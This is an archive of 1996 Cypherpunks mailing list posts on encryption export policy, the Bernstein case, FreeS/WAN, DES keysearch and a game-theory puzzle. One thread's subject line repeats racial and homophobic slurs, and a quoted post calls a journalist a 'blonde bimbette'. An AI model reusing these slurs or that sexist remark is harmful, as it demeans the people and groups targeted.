From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 27 Jul 1996 09:40:32 +0800
To: gnu@toad.com
Subject: Securing 5% of the Internet against Wiretapping by Christmas
Message-ID: <199607262316.QAA06024@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been working on a project in secret for a few months, and now am
talking about it with everyone so that we can all help it along.

Want all the Internet traffic between you and every other
privacy-conscious site on the net to automatically be encrypted using
Triple-DES, RSA, and Diffie-Hellman?  Without changing your hardware
or software, except to stick a Linux PC on your network, or install a
new version of Linux on your laptop?  Want it all by Christmas?  Then
check out

	http://www.cygnus.com/~gnu/swan.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 27 Jul 1996 07:22:18 +0800
To: <cypherpunks@toad.com
Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
Message-ID: <199607262014.NAA02740@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> At 6:40 PM 7/26/96, Bill Frantz wrote:
> >At  9:09 AM 7/26/96 -0700, Timothy C. May wrote:
> >>... I hate the term "nerd," as I hate the
> >>names "dweeb," "geek," "jerk," etc. Believe me, anyone who thinks being
> >>called a "nerd" is complimentary, or anyone who labels himself as a "geek,"
> >>is probably one who would call himself a "nigger," or a "queer.")

[...]

> >People with pride in themselves and what they do can make their detractors
> >eat their insults.  We should make it clear that "nerd," "dweeb," "geek,"
> >"jerk," etc. are where the money is.  We should turn them into terms of
> >pride in what we are and what we do.
 
> Maybe it's a generational thing (though Bill is as old as me, I think), but
> terms of insult are just that. The biggest users seem to be clueless
> journalists, like blonde bimbette Sue Hutchinson of the "S.J. Mercury
> News," who writes repeatedly of "nerdfests," and "geek conventions." (Hey,
> maybe womyn need to reclaim the terms "bimbo" and "airhead"?)

[..]

> --Tim May

Isn't it a little strange that Tim was on the exact opposite side of this argument
when I started a thread titled:

"CypherPUNK considered harmful"

... in which I argued that we needed a better name for folks like us?

Peter Trei
trei@process.com

[I'm off to the Security WG of the W3C in Redmond, so I won't see replies until
 Wednesday.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 27 Jul 1996 04:24:59 +0800
To: cypherpunks@toad.com
Subject: AP on Crypto Hearing
Message-ID: <199607261628.QAA23111@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-25-96. The Associated Press: 
 
   Computer Codes May Aid Crime   
 
 
   Washington -- FBI Director Louis Freeh warned Congress on 
   Thursday that allowing uncontrolled export of U.S. computer 
   security codes may help international criminals and 
   terrorists hide their activities from law enforcement. 
 
 
   "Encryption products used unchecked by criminals and 
   terrorists for their illegal activities pose an extremely 
   serious and, I believe, unacceptable threat," Freeh told 
   the Senate Commerce, Science and Transportation Committee. 
 
 
   Legislation pending in the Senate would permit U.S. 
   companies to export high-tech encryption devices that 
   ensure greater privacy for computer files, electronic mail 
   messages and systems such as stock exchange transactions. 
 
   Sponsors said the bill would "help America maintain our 
   superiority in software development" and guard against 
   unwarranted government intrusion. 
 
 
   "It is irrelevant that we can make a better product if we 
   cannot sell it," said Sen. John Ashcroft, R-Mo., one of the 
   sponsors. 
 
 
   The Clinton administration has proposed that encryption 
   exports be allowed only if a decoding "key" for the devices 
   is left with a third party -- such as a bank or insurance 
   company -- so that law enforcement personnel with a court 
   order could break the code, if necessary. 
 
 
   Freeh said such an arrangement would safely open profitable 
   foreign markets for U.S. software companies. The Internet, 
   he said, "was never intended as a place without police 
   officers. We need cops there, as we do elsewhere, to 
   protect people, to guard their rights." 
 
  
   The encryption codes available today are so powerful, Freeh 
   said, that it would take the FBI more than a year to decode 
   a single message in some cases. Ramzi Yousef, on trial in 
   New York on charges of plotting to bomb a dozen U.S. 
   airliners, used a laptop computer containing files the FBI 
   still hasn't been able to decode, he added. 
 
 
   Sponsors and industry officials noted, however, that many 
   of these devices are already available abroad, and anyone 
   can download them free from the Internet. They can also be 
   sold within the United States at local computer stores. 
 
 
   "The criminal element the administration is trying to 
   prevent from obtaining this technology already has it," 
   said Roel Pieper, president of Tandem Computers Inc. "The 
   only ones who suffer as a result of this policy is the U.S. 
   industry." 
 
  
   Netscape Communications Corp. President Jim Barksdale 
   estimated his company will lose $40 million this year in 
   potential export sales for encryption products. 
 
 
   But a top official at the National Security Agency -- whose 
   job is to break secret codes -- said the encryption "genie 
   is not out of the bottle." NSA Deputy Director William 
   Crowell said encryption won't be widely used until it is 
   marketed and sold, with support to help people use it. 
 
 
   "The administration's proposal is not designed to keep the 
   plug in the bottle, but to help provide a full range of 
   trusted security services," Crowell said. 
 
 
   Industry executives also said use of the decoding keys 
   would be costly and raises questions about government 
   access to private business and personal information, such 
   as bank and medical records. 
 
 
   "Keys can be compromised in many ways. They can be stolen, 
   revealed by disgruntled employees or obtained through 
   bribery, Pieper said. 
 
 
   ----- 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Sat, 27 Jul 1996 07:18:07 +0800
To: cypherpunks@toad.com
Subject: Re: FTP Software Licenses Pretty Good Privacy 07/23/96
In-Reply-To: <Pine.GUL.3.94.960724145503.24951D-100000@Networking.Stanford.EDU>
Message-ID: <96Jul26.163748edt.20481@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <Pine.GUL.3.94.960724145503.24951D-100000@Networking.Stanford.EDU>, Rich Graves <llurch@networking.stanford.edu> writes:

    > -----BEGIN PGP SIGNED MESSAGE-----
    > Yes, this was in InfoWorld a couple weeks ago. But...

    >> Under the terms of the agreement, PGP has licensed its encryption  
    >> software to FTP for use in OnNet32 2.0 for Windows 95 and Windows NT, 
    >> both versions of which will ship in the third quarter of this year on 
    >> both sides of the Atlantic.                                        ^^
    >   ^^^^^^^^^^^^^^^^^^^^^^^^^^

    > This is news. I'd asked for clarification of this point, but I guess
    > everybody killfiled me. Oh well.

I certainly haven't killfiled you, and I am also completely mystified
by this.  Any comments from the politikal people on this list?
Perhaps two different companies (US and not)?

-Robin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 27 Jul 1996 09:49:19 +0800
To: cypherpunks@toad.com
Subject: Hackers on tv alert (for SF area only)
Message-ID: <v03007802ae1f05c173c9@[17.219.103.247]>
MIME-Version: 1.0
Content-Type: text/plain


San Francisco TV channel 4 (the NBC affiliate) will broadcast a
"news" segment on hackers "they can access your computer and
ruin your life" at/around 9:00 PM this evening (Friday, July 26).

I'm sure it will be as informative, educational and unbiased, just
like the rest of the Olympic coverage.

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 27 Jul 1996 03:59:54 +0800
To: cypherpunks@toad.com
Subject: IET_fws
Message-ID: <199607261638.QAA23802@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stallings reports in 7-23-96 Network World on the IETF's proposals for
Net security: 
 
 
   Toward that end, the IETF last summer published five 
   security-related proposed standards -- RFC 1825 through RFC 
   1829 -- that define a security capability at the IP level. 
 
 
   IP-layer security encompasses two functional areas: 
   authentication and privacy. The authentication mechanism 
   assures that a received packet was, in fact, transmitted by 
   the party identified as the source in the packet header and 
   that the packet was not altered in transit. The privacy 
   facility enables communicating nodes to encrypt messages to 
   prevent eavesdropping by third parties. 
 
 
   ----- 
 
   http://jya.com/ietfws.txt 
 
   IET_fws 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 17:56:16 +0800
To: cypherpunks@toad.com
Subject: Re: Produce 7 Hertz Frequency
Message-ID: <ae1dbaa301021004cde1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:56 AM 7/26/96, Mike Duvos wrote:


>I'm not sure what this gentleman's application is.  If I wanted
>a 7 hz signal, I would take my handy dandy programmable digital
>signal generator, press the "sin" button, and punch in "7" on
>the numeric keypad.
>
>Am I missing something here?

What does "sin" have to do with the number 7? Oh, you must mean the movie
"Se7en," in which the Se7en deadly sins were central to the plot. I get it.
The seven deadly sins are the seven deadly hurts.

(Cos I know about sin.)

Ironic that the original message was from Jerome Tan, eh? Someone must've
trigged this whole thread. I fear we're going in circles.

"Kenneth, what is the frequency?"

--Dan Rather

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 27 Jul 1996 10:43:48 +0800
To: Peter Trei <trei@process.com>
Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
In-Reply-To: <199607262014.NAA02740@toad.com>
Message-ID: <Pine.GUL.3.95.960726165628.11417L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I missed the original, but it appears that Peter Trei once claimed that Tim
May wrote:

> > >People with pride in themselves and what they do can make their detractors
> > >eat their insults.  We should make it clear that "nerd," "dweeb," "geek,"
> > >"jerk," etc. are where the money is.  We should turn them into terms of
> > >pride in what we are and what we do.
>  
> > Maybe it's a generational thing (though Bill is as old as me, I think), but
> > terms of insult are just that. The biggest users seem to be clueless
> > journalists, like blonde bimbette Sue Hutchinson of the "S.J. Mercury
> > News," who writes repeatedly of "nerdfests," and "geek conventions." (Hey,
> > maybe womyn need to reclaim the terms "bimbo" and "airhead"?)

Actually, I know Sue, and I believe she has. She's got a rather healthy
sense of humor, thank you, "for a womyn."

I don't think it's a generational thing, because lord (tm) knows that there
are members of my generation with sticks firmly up their asses, too. 

- -rich
 nerd

- -----BEGIN GEEK CODE BLOCK-----
Version: 3.1

GCM$/GSS d- s++:- a- C++ UU+ P++ L+ E- W+++ N++ o+ K++ w !O M+
V-- PS++ PE Y++ PGP++ t 5 X R- tv- b+ DI++ D- G+ e++* h r* y+
- -----END GEEK CODE BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfldt5NcNyVVy0jxAQEXMgIAh+jiyGCmcJUm2Adzq46I51/QhBeMAejn
yXQER/sdniq2esC6jH/07eHScp5m1WUy9m4UW+MSR92PKryghb1b0w==
=gXd/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Sat, 27 Jul 1996 08:34:35 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <2.2.32.19960726220742.00726ee0@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:55 PM 7/25/96 -0500, you wrote:
>At 09:09 AM 7/25/96 -0500, you wrote:
>>Here's a puzzle for our game theorists.
>>
>>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>>how they plan to split the money: they stay in line, and the first guy
>>suggests how to split the money. Then they vote on his suggestion. If
>>50% or more vote for his proposal, his suggestion is adopted.
>>
>>Otherwise they kill the  first robber and now it is the turn of guy #2
>>to make another splitting proposal. Same voting rules apply.
>>
>>The question is, what will be the outcome? How will they split the
>>money, how many robbers will be dead, and so on?
>>
>>igor
>>
>
>Here's my guess:
>Eache robber is going to want the largest share of the money possible.
>Therefore The first guy dies automatically because that increases the share
>size.  This continues on until there are only two robbers left.  Robber #19
>suggests that he receives the full 20 million and since his vote is 50%, he
>receives it all.  18 robbers dead.

I wasn't very clear why #1 died.  Any suggestion of his is shot down and
then he is killed.  And so on... and so on... until the final two are left.
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Sat, 27 Jul 1996 08:42:47 +0800
To: cypherpunks@toad.com
Subject: Re: Am I protected by ignorance?
Message-ID: <2.2.32.19960726211544.006de9b8@tansoft.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 7/26/96 +0200, Remo Pini wrote:
>
>Since there is no way for me to know where the server stands, do I violate 
>the ITAR, and if so, am I realistically prosecutable?

The Feds consider crypto as munitions so I guess you could ask that same
question as:
      I sold a bunch of Stinger missiles to a man with an American sounding
     name, "Smith."  How was I to know he was __________[bad guys]?

I bet they would prosecute you for the missiles so I'd suspect they would
on the crypto too.

Me?  A lawyer?  HAHAHAHAHAHhahahahhaaa Yeah, right!
Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sat, 27 Jul 1996 02:22:33 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607261359.GAA05920@jobe.shell.portal.com>
Message-ID: <199607261520.RAA13570@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Someone like Hal <hfinney@shell.portal.com> wrote something like: 
>  
> Here it is for three people:
>
> #1 (first in line) proposes that he gets it all.  #1 votes yes, #2
> probably votes no (since he will get it all if the proposal fails, by
> the above) and #3 (end of line) reasons like this: if the proposal
> fails, he (#3) will get nothing because #2 will get it all.  Therefore
> voting yes or no makes no difference to whether #3 stays alive (his
> first priority) or how much money he makes (his second priority).  But
> it does make a difference in terms of keeping as many people alive as
> possible (his third priority).  So he votes yes because of this third
> reason.  Therefore the proposal passes and the first person in line
> gets it all in this case.
>
> Of course, #1 could have offered some money to #3 and gotten his vote,
> but that would violate the terms of the problem: #1 wants to make as
> much money as possible.  And since he can get #3's vote even while
> offering nothing to him, that is what he will do.
   
  
Well this isn't quite true because the cypherpunks are 
apparently allowed to change their votes based upon how their 
votes will effect other cyhpherpunks' votes.  So #3 can vote 
"No" on "#1 gets it all" proposals because he knows that #1 
_knows_ he will vote "No" on "#1 gets it all" proposals and thus
#1 will instead give #3 some money.
 
 
So if you are going to play it that way then you have to be sure
that none of your cypherpunks are allowed to think about the 
possibility that their own (probable) voting will affect their
companions' voting.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMfjiRkjbHy8sKZitAQHq7wL/QKAA1Zz7s7PvBWs5SNEqD8X1bivgFg2l
eFuUgcsM1ZJeZ9XHc6cWVwDWfn7Z8Xu15sflbTBvkIyN7IVKBq5ff2nchHdqj4XQ
y58h0lU0ZYyqlRceeTymrEB2Lebw6WJM
=qJ1E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jul 1996 10:43:14 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Bernstein files for partial summary judgement in crypto case
Message-ID: <199607270022.RAA09976@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:28 PM 7/25/96 -0700, John Gilmore wrote:
>Here's the press release on the latest development in the Bernstein
>case.  

>July 26, 1996  				     Electronic Frontier Foundation 
>In his 45-page memorandum in support of his motion, Bernstein sets forth
>several First Amendment arguments: 

>*       Any legal framework that requires a license for First Amendment
>protected speech, which may be granted or withheld at the discretion of a
>government official, is a prior restraint on speech.  In order for this
>framework to be acceptable, the government has the burden of showing that
>publication will "surely result in direct, immediate, and irreparable
>damage to our Nation or its people" and that the regulation at issue is
>necessary to prevent this damage.  The government has not met this burden
>regarding the ITAR legal framework. 

Maybe it's just me, but why would even the _certainty_ that a publication 
will "surely result in direct, immediate, and irreparable damage to our 
Nation or its people" justify violation of 1st amendment rights?   There 
are, certainly, kinds of "damage" which should not warrant prohibition:  If, 
for instance, a business regularly cheats its customers, my investigation of 
that behavior and revealing it publicly would certain "damage" that 
business, but we conclude that's justified if for no other reason than it's 
the truth.  

Would digging up an embarrassing revelation about "our Nation or its people" 
constitute "irreparable damage" sufficient to justify concluding that the 
1st amendment didn't apply?  Had the fact that we'd slaughtered Indians in 
the late 1800's been kept secret until today, would its discovery and 
publication be that "irreparable damage" that regulation could legitimately 
seek to prohibit?  Would the news that the events leading up to the "Gulf of 
Tonkin resolution" were a fraud cause "irreparable damage"?  Would finding 
out the truth about the Watergate incident cause "irreparable damage"?    

In a sense, speaking of any of these incidents might cause "irreparable 
damage"  to government and people, but it's "damage" that a person should 
simply be entitled to do, given the concepts of free speech and the 1st 
amendment.

In short, I don't think Bernstein should give an inch.  There may, in fact, 
be limits on the 1st amendment, but I don't see this as being one of them.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Sat, 27 Jul 1996 08:28:28 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <1.5.4.32.19960726212858.00698e9c@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:19 AM 7/26/96 -0400, you wrote:
>On the other hand, a proposal by the first guy to split the
>proceeds equally among the first ten should be satisfactory to the first
>ten.  On that basis nobody dies and ten receive two million each, if we
>assume that each is a simple profit maximizer.
>
>I think that that result is stable, but am not going to try to prove
>that it is.  (If the result is not stable, it should be relatively easy
>to establish that fact.)

Slightly more stable is:  punk #1 proposes that punks 2 - 10 get all the 
money, and he gets none, if he prefers poverty to death.  Now, why does this
work?

Punk #1 has set a precedent that improves the share of each of the following
9 cypherpunks by 11% over the 'first 10 split evenly' proposal, to 2.22 million.

In order to justify killing punk #1, according to the rules, punk #2 will
have to come up with a proposal that improves his share to more than 2.22 
million (because the cypherpunks don't want to kill each other unless there
is more money to be made)

But he can't - there are still 18 other punks left, and he'll still need 9
additional votes on his side to stay alive - and he'll die if he gives less
money to the 'lucky 9' than #1's proposal, since everyone can see that as
more people die, the total profit available to the remainder will increase.

In other words, if he votes no, he will be forced to offer 2.22 million to
punks 3 - 11, to stay alive, and take no money himself.  He loses by voting
no, so he is a guaranteed yes.

Punk #3 will consider voting no.  Since there will only be 18 left when he
gets the proposal, he can also propose 2.22 million to punks 3 - 11.  But
a) he can't do better than 2.22 million, and that means that he has to vote
yes, since he doesn't want to kill the other punks, everything else being
equal.

Punk 4 is in the exact same situation - with 17 left, he still needs 9 to
win, and voting 2.22 million to punks 4 - 12 won't gain him anything over
voting yes.  So he will vote yes because he doesn't want to kill.

Punk 5 is the first one with a chance at a windfall.  If he bumps off 1 - 4
he can propose 2.5 million for himself and 6-12.   But he is vulnerable to
the same strategy from punk #7.  7 will have no reason to keep #5 alive, since
that will reduce his profit margin.  #5 will be forced to vote yes to stay
alive.

#6 is in the same situation as number 5, since he can't increase the profit
margin.  He has to vote yes

#7 is vulnerable to #9.  8 has no advantage, they both vote yes.

#9 is vulnerable to 11, and 10 has no advantage.  They both vote yes, and
that is it.

----

---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 27 Jul 1996 14:50:53 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [Noise] [Smut] [Off-topic] Re: A Global Village, or thefuture   of porn on the net
In-Reply-To: <2.2.32.19960725070145.00d77a58@mail.teleport.com>
Message-ID: <v03007805ae1ed9603a8a@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:01 -0700 7/25/96, Alan Olsen wrote:


>Porn stories and/or hacked pictures of celebrities already occurs.  Has
>since I have been on usenet...  (Many years now.)  One of my favorites
>involves the Brady Bunch...  In fact there are celebrities who have hired
>people to track down phoney pictures and get them pulled from web sites.
>
>(I always expected something like this to show up on Star Trek:TNG.  Having
>Beverly Crusher catching Weasly with the holodeck porn programs involving
>all sorts of convelutions of the bridge crew.  He would probibly blame it on
>Riker...)

It WAS done on TNG. It was the first Lt. Barclay Episode. He was living in
the Holodeck. He had a "Love Goddess" program of Troi, for example.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 26 Jul 1996 20:40:12 +0800
To: ttw@spire.com (Tyler Whitaker)
Subject: Re: PREDICTIONS, MUST BE BREAK TIME...
In-Reply-To: <960725173949.d5f@spire.com>
Message-ID: <199607260832.SAA25609@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> The AFIM can 'rebuild' fingerprints to overcome dirt a scar tissue
> problems. It also uses a special lense which reads only 3d images so
> photocopies and a cut off fingers will not work.
> 
> Tyler Whitaker
> ttw@spire.com
> Senior Internet Engineer
> Spire Technologies.

It is interesting to note that when your fingers / hands are cut off
they automagically turn into two dimensional objects.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Fri, 26 Jul 1996 21:26:41 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: DES-busting Javanese pagers and TVs
In-Reply-To: <199607240039.UAA27954@unix.asb.com>
Message-ID: <199607260647.SAA11707@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


"Deranged Mutant" <WlkngOwl@unix.asb.com> wrote:

   Would it be better to have them all try random keys rather than use 
   assigned keyspaces?  Can't keysearches be shorted by half (not that 
   it's that significant, 2^55 rather than 2^56) using complement  keys?

2^55 bits is not significant?  It is on my hardware!

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Mencken and Nathan's Second Law of The Average American:
        All the postmasters in small towns read all the postcards.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 27 Jul 1996 07:54:36 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <199607260456.VAA01884@netcom12.netcom.com>
Message-ID: <Pine.LNX.3.94.960726183817.1142A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 25 Jul 1996, Mike Duvos wrote:

> Date: Thu, 25 Jul 1996 21:56:52 -0700 (PDT)
> From: Mike Duvos <mpd@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Produce 7 Hertz Frequency
> 
> >                           SANDY SANDFORT
> >  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> > 
> > C'punks,
> > 
> > On Thu, 25 Jul 1996, Jerome Tan wrote:
> > 
> > > Does anyone know how to produce a 7 hertz frequency?
> > 
> > No, but hum a few bars and we'll fake it.
> 
> I'm not sure what this gentleman's application is.  If I wanted
> a 7 hz signal, I would take my handy dandy programmable digital
> signal generator, press the "sin" button, and punch in "7" on 
> the numeric keypad.
> 
> Am I missing something here?
> 
> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $
> 

Well... we could always tell him to do it the hard way...

1) set a bicycle wheel up to go around exactly 7 times per second.

2) attach a baseball card

3) place this somewhere so that the baseball card hits something exactly
once per rotation.

The frequency of the baseball card hitting will be 7 hertz. ;)

 --Deviant
Television has brought back murder into the home -- where it belongs.
        -- Alfred Hitchcock


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfkT4jAJap8fyDMVAQG9sgf9EembGEU2XC+7IOAS868v7ak4JyniX3Pr
1fwZDmzVPmmXFMhUJoXN8N5UP4V68L3/S5pYlVjzN1xyzjqSloGW1MEpNFIswoGI
5m7tx0SjES8/Xy4b0kf1O4x18yb82TlgKo4FMevqWluIxk7UYU3Knnhym0nYHj8F
txoBr92ZO2416CYRuU6+gpS0+4Je7DWNIOhdKtg+dYUmOJQNp4gZ3ovBkqwIoWw7
mqFwTePIBZtHEABt4blwcPGoz3q5aCM4TBJm7DFK8ZOPZwwnLXEkXlo200XGH9dG
DS5EwCoY0lisI5boaXs+NY89mEuf5Mevu+ApI1gKWnvXG37MbeU3Ug==
=PRMS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 27 Jul 1996 12:34:06 +0800
To: cypherpunks@toad.com
Subject: Schelling points and enthropy of human mind
Message-ID: <199607270005.TAA07330@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi,

Tim May presented an interesting concept of two persons who
want to meet in Washington DC but forgot to decide where to meet.
He says that they will likely to be in only several places and
that such places will be "points of low enthropy".

The question is, how do you define "enthropy" in this case?

Also, for a while I've been thinking about enthropies of
cultures and individuals. I wonder if anyone knows any books
or theories that define such things.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 27 Jul 1996 11:51:44 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
In-Reply-To: <ae1e61d70302100416ec@[205.199.118.202]>
Message-ID: <199607270013.TAA07369@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> 
> I just cringe when I meet young programmers at Cypherpunks who mumble "I'm
> just a computer geek." Fine, I write them off as geeks.
> 

OK, I am a foreigner. Can anyone explain me what the word "geek" means
and what are the origins of this word? I thought it was a cool word,
meaning someone orthogonal to the present world but being able to 
change it.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 27 Jul 1996 10:55:56 +0800
To: banisar@epic.org (Dave Banisar)
Subject: Re: Freeh Testimony 7/25/96
In-Reply-To: <n1373804503.42138@epic.org>
Message-ID: <199607270019.TAA11458@homeport.org>
MIME-Version: 1.0
Content-Type: text



I find it unfortunate that Mr. Freeh doesn't understand his job.  It
is to enforce the law.  This basic lack of understanding of his
responsibilities explains a lot, including filegate.  He was just
protecting America from Espionage, and the law be damned.

Adam


| This is the written testimony of FBI Director Freeh before the
| Senate Commerce Committee on S 1726, the Pro-Code legislation.


| But we are also mindful of our principal mission responsibilities:
| protecting America's public safety and national security in the myriad of
| criminal, terrorist, and espionage cases that confront us every day.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 27 Jul 1996 08:20:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Produce 7 Hertz Frequency
In-Reply-To: <ae1dbaa301021004cde1@[205.199.118.202]>
Message-ID: <Pine.LNX.3.94.960726192459.1142C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jul 1996, Timothy C. May wrote:

> Date: Fri, 26 Jul 1996 16:48:43 -0700
> From: "Timothy C. May" <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Re: Produce 7 Hertz Frequency
> 
> At 4:56 AM 7/26/96, Mike Duvos wrote:
> 
> 
> >I'm not sure what this gentleman's application is.  If I wanted
> >a 7 hz signal, I would take my handy dandy programmable digital
> >signal generator, press the "sin" button, and punch in "7" on
> >the numeric keypad.
> >
> >Am I missing something here?
> 
> What does "sin" have to do with the number 7? Oh, you must mean the movie
> "Se7en," in which the Se7en deadly sins were central to the plot. I get it.
> The seven deadly sins are the seven deadly hurts.
> 

Gee... or mabey he's refering to "sin" as the common abreviation of "sine"
as in "sine wave".

 --Deviant
Just once, I wish we would encounter an alien menace that wasn't
immune to bullets.
                -- The Brigadier, "Dr. Who"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfkcGTAJap8fyDMVAQH7egf+Ij2xBdjejSrwmBgeySG0LTIa5a7n5+o9
5xJb9ZOdzVkFNVmwQnYmXn6HK+GWHME2U04XjHADyb1JTTKJQeoYiXKQSfeiRn4O
mqY9pbXzDlAvzqOl6qRH7cRxoFRXo/kvnaTbt2vTGrPL5wxAPLzMuOXVGxRn/vYt
yk9a51ZNs4+7CzVabimpSzmpw0fajuTgLcskQIa4gXISKwK5IYV3rMh1/dpOebAo
